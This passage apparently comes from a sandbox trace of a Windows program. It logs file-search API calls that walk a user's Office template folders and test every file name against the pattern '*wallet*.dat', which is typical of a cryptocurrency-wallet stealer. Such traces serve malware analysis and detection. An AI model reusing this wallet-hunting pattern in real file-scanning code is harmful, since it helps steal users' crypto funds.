Arc]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328951[[fn=tabbed arc]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x978020a2, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x978020a2, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x978034d1, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xe63, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.594] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983aecac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983aecac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983affea, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1318, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328972[[fn=Tab List]].glox", cAlternateFileName="TM2A4A~1.GLO")) returned 1 [0175.594] PathMatchSpecA (pszFile="TM03328972[[fn=Tab List]].glox", pszSpec="*wallet*.dat") returned 0 [0175.594] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328972[[fn=Tab List]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328972[[fn=tab list]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x983aecac, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x983aecac, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x983affea, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1318, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.594] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983bfdac, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983bfdac, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983bfdac, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1930, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328975[[fn=Theme Picture Accent]].glox", cAlternateFileName="TM8247~1.GLO")) returned 1 [0175.594] PathMatchSpecA (pszFile="TM03328975[[fn=Theme Picture Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0175.594] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328975[[fn=theme picture accent]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x983bfdac, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x983bfdac, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x983bfdac, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1930, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.594] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98c45cf1, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c45cf1, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c47043, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x15fe, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328983[[fn=Theme Picture Alternating Accent]].glox", cAlternateFileName="TM8366~1.GLO")) returned 1 [0175.594] PathMatchSpecA (pszFile="TM03328983[[fn=Theme Picture Alternating Accent]].glox", pszSpec="*wallet*.dat") returned 0 [0175.594] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98c45cf1, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98c45cf1, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98c47043, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x15fe, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.595] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9879b688, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9879b688, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9879b688, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x1831, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328986[[fn=Theme Picture Grid]].glox", cAlternateFileName="TM02CE~1.GLO")) returned 1 [0175.595] PathMatchSpecA (pszFile="TM03328986[[fn=Theme Picture Grid]].glox", pszSpec="*wallet*.dat") returned 0 [0175.595] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x9879b688, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9879b688, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9879b688, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x1831, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.595] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98ad5311, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98ad5311, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98ad5311, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xc03, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328990[[fn=Varying Width List]].glox", cAlternateFileName="TM6E5C~1.GLO")) returned 1 [0175.595] PathMatchSpecA (pszFile="TM03328990[[fn=Varying Width List]].glox", pszSpec="*wallet*.dat") returned 0 [0175.595] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328990[[fn=varying width list]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98ad5311, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98ad5311, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98ad5311, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xc03, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.595] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 1 [0175.595] PathMatchSpecA (pszFile="TM03328998[[fn=Rings]].glox", pszSpec="*wallet*.dat") returned 0 [0175.595] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328998[[fn=Rings]].glox\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328998[[fn=rings]].glox\\*"), lpFindFileData=0x19504c | out: lpFindFileData=0x19504c*(dwFileAttributes=0x98913495, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98913495, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98913495, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x141f, nFileSizeLow=0x207d0, dwReserved0=0x20000, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0175.595] FindNextFileA (in: hFindFile=0x4ea750, lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98913495, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98913495, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98913495, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 0 [0175.595] FindClose (in: hFindFile=0x4ea750 | out: hFindFile=0x4ea750) returned 1 [0175.596] FindNextFileA (in: hFindFile=0x4eab50, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9477a, dwReserved1=0x207d0, cFileName="1033", cAlternateFileName="")) returned 0 [0175.596] FindClose (in: hFindFile=0x4eab50 | out: hFindFile=0x4eab50) returned 1 [0175.596] FindNextFileA (in: hFindFile=0x4ead50, lpFindFileData=0x1963e4 | out: lpFindFileData=0x1963e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x9477a, cFileName="Word Document Bibliography Styles", cAlternateFileName="WORDDO~2")) returned 1 [0175.596] PathMatchSpecA (pszFile="Word Document Bibliography Styles", pszSpec="*wallet*.dat") returned 0 [0175.596] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\*"), lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName=".", cAlternateFileName="")) returned 0x4ea590 [0175.599] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="..", cAlternateFileName="")) returned 1 [0175.599] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9763f96c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9763f96c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9764341c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x515ca, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851216[[fn=apasixtheditionofficeonline]].xsl", cAlternateFileName="TM0285~2.XSL")) returned 1 [0175.599] PathMatchSpecA (pszFile="TM02851216[[fn=apasixtheditionofficeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.599] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851216[[fn=apasixtheditionofficeonline]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851216[[fn=apasixtheditionofficeonline]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x9763f96c, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9763f96c, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9764341c, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x515ca, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.599] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9779cbce, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9779cbce, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9779f2aa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486d2, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851217[[fn=chicago]].xsl", cAlternateFileName="TM0285~4.XSL")) returned 1 [0175.599] PathMatchSpecA (pszFile="TM02851217[[fn=chicago]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.599] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851217[[fn=chicago]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851217[[fn=chicago]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x9779cbce, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9779cbce, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9779f2aa, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x486d2, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.599] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97625f0b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97625f0b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9762869a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4181d, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851218[[fn=gb]].xsl", cAlternateFileName="TM0285~1.XSL")) returned 1 [0175.599] PathMatchSpecA (pszFile="TM02851218[[fn=gb]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.599] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851218[[fn=gb]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851218[[fn=gb]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x97625f0b, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x97625f0b, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x9762869a, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x4181d, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.600] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978514f8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978514f8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97853bdd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e7cc, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851219[[fn=gostname]].xsl", cAlternateFileName="TM003E~1.XSL")) returned 1 [0175.600] PathMatchSpecA (pszFile="TM02851219[[fn=gostname]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.600] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851219[[fn=gostname]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851219[[fn=gostname]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x978514f8, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x978514f8, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x97853bdd, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3e7cc, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.600] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976cbe5d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x976cbe5d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x976d0c4a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d498, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851220[[fn=gosttitle]].xsl", cAlternateFileName="TM0285~3.XSL")) returned 1 [0175.600] PathMatchSpecA (pszFile="TM02851220[[fn=gosttitle]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.600] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851220[[fn=gosttitle]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851220[[fn=gosttitle]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x976cbe5d, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x976cbe5d, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x976d0c4a, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x3d498, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.600] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983d213f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d213f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d4a29, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x456ff, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851221[[fn=harvardanglia2008officeonline]].xsl", cAlternateFileName="TM8026~1.XSL")) returned 1 [0175.600] PathMatchSpecA (pszFile="TM02851221[[fn=harvardanglia2008officeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.600] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851221[[fn=harvardanglia2008officeonline]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851221[[fn=harvardanglia2008officeonline]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x983d213f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x983d213f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x983d4a29, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x456ff, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.600] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982fc8d7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982fc8d7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x982fc8d7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x47d22, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851222[[fn=ieee2006officeonline]].xsl", cAlternateFileName="TMA855~1.XSL")) returned 1 [0175.600] PathMatchSpecA (pszFile="TM02851222[[fn=ieee2006officeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.600] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851222[[fn=ieee2006officeonline]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851222[[fn=ieee2006officeonline]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x982fc8d7, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x982fc8d7, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x982fc8d7, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x47d22, nFileSizeLow=0x141f, dwReserved0=0x207d0, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="TM5448~1Ð\x07\x02")) returned 0xffffffff [0175.600] FindNextFileA (in: hFindFile=0x4ea590, lpFindFileData=0x195d5c | out: lpFindFileData=0x195d5c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98050de7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98050de7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98055ce4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41f76, dwReserved0=0x141f, dwReserved1=0x207d0, cFileName="TM02851223[[fn=iso690]].xsl", cAlternateFileName="TM536F~1.XSL")) returned 1 [0175.601] PathMatchSpecA (pszFile="TM02851223[[fn=iso690]].xsl", pszSpec="*wallet*.dat") returned 0 [0175.601] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851223[[fn=iso690]].xsl\\*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document bibliography styles\\tm02851223[[fn=iso690]].xsl\\*"), lpFindFileData=0x1956d4 | out: lpFindFileData=0x1956d4*(dwFileAttributes=0x98050de7, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98050de7, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x98055ce4, ftLastWriteTime.dwLowDateTime=0x1d705ee, ftLastWriteTime.dwHighDateTime=0x0, 